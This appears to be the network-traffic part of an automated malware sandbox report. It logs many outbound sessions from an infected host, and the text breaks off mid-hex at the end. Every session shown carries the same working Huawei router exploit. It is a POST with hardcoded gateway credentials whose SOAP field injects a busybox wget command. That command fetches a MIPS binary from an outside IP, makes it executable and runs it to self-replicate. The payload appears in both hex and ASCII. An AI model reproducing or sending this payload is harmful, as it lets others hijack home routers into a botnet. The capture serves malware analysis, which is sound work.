                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          94192.168.2.155017620.253.161.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.524339914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          95192.168.2.1549306115.89.132.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.524379969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          96192.168.2.155155693.159.166.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.524379969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          97192.168.2.1551456197.169.248.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.524429083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          98192.168.2.154419041.125.79.20237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516531944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          99192.168.2.153328641.160.209.17237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516556978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          100192.168.2.1539464171.105.73.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516558886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          101192.168.2.1556114157.69.1.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516575098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          102192.168.2.1549102197.219.172.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516596079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          103192.168.2.154287841.92.51.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516608000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 